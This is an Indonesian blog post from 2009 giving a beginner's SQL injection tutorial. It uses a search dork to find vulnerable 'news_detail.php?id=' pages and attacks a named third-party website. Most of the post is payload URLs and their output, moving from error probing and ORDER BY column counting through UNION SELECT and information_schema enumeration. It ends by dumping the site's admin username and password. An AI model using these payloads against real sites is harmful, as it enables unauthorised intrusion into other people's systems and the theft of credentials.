Pages

Minggu, 06 Desember 2009

SQL Injection Pada PHP

dir\system32 Untuk pertama kalinya gw mau memberanikan diri untuk posting tentang SQL Injection, soal nya gw juga masih belajar dalam hal ini :lol: kalo kiranya gw salah tolong di koreksi dan yang udah master jangan baca postingan ini ini cuma buat newbie kaya gw DORK Code: Select all inurl:news_detail.php?id= Contoh target Code: Select all http://www.lbpl.in/news_detail.php?id=14 masukian tanda petik (') kurang lebih seperti di bawah ini Code: Select all http://www.lbpl.in/news_detail.php?id=14' lalu muncul error seperti Code: Select all You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 berarti site ini Vuln, setelah terdapat error seperti di atas gunakan perintah ORDER BY untuk mencari panjang column, dan jangan lupa gunakan -- di belakang angka yang di masukan :lol: contoh nya seperti di bawah ini http://www.lbpl.in/news_detail.php?id=1 ... 20by%201-- tidak menampilkan eror coba gunakan order by 10 atau 100 kurang lebih nya seperti contoh Code: Select all http://www.lbpl.in/news_detail.php?id=14%20order%20by%2010-- order by 10 site mengeluarkan error seperti Unknown column '10' in 'order clause' berarti panjang column tidak sampai 10 :lol: coba gunakan order by 5 untuk mengecek nya.. ternyata site masih mengeluarkan error seperti di atas gunakan lagi order by 4 untuk mengecek yang ke 3 kali nya.......... sssttttt site tidak menampilkan error setelah itu gunakan perintah UNION+ALL+SELECT+1,2,3,4-- loh kok cuma sampai 4 karena batas eror nya ada di column 4, jangan lupa gunakan gunakan (-) kurang lebih contoh nya seperti di bawah Code: Select all http://www.lbpl.in/news_detail.php?id=-14 union all select 1,2,3,4-- setelah menggunakan perintah UNION+ALL+SELECT+1,2,3,4-- site tidak mengeluarkan error melainkan mengeluarkan angka angka ajaib kenapa di sebut ajaib karena dengan angka itu kita bisa melanjutkan SQLInjection he2 setelah angka muncul gunakan perintah VERSION() column angka, contoh nya di bawah ini Code: Select all http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,version(),3,4-- setelah menggunakan perintah VERSION() muncul seperti 5.0.77MM0.1-LOG ternyata versi 5 beruntung lah gw malam ini ck ck soal nya kalo Versi 4 musti tebak tebak table nya ok masalah versi 4 ntr nyusul lagi :P setelah mengetahui versinya ganti perintah VERSION() dengan GROUP_CONCAT(TABLE_NAME) serta berikan perintah FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()-- di belakang column, perintah tersebut untuk mengetahi nama nama table pada database;) kurang lebih contohnya di bawah ini Code: Select all http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(TABLE_NAME),3,4%20FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()-- Setelah menggunakan perintah di atas muncul ADMIN,BANNER,CATALOGUE,NEWS,USERS,VIDEO Gunakan table admin, sebelum nya kita meng-konversi dolo table admin menjadi bentuk hexadecimal_sql seperti 0x41444d494e kurang lebih contoh nya seperti Code: Select all http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(column_NAME),3,4%20FROM+INFORMATION_SCHEMA.columnS+WHERE+TABLE_name=0x41444d494e-- setelah itu muncul ID,USERNAME,PASS inilah detik detik menuju ahir :D ganti Column_name dengan 0x2b,USERNAME,PASS kurang lebih nya lihat contoh yang terahir kali nya.... :lol: :lol: :lol: :lol: :lol: Code: Select all http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(0x2b,USERNAME,PASS),3,4%20FROM+admin-- nah ahir dari perjalanan ini adalah ADMINADMIN Username = admin Pass = admin Cukup sampai di sini Tutorial CUPU dari gw kalo ada salah kata atau penempatan tulisan tolong di koreksi, sekian dan Terima kasih..... Ref: http://alattempur.blogspot.com/

0 comments: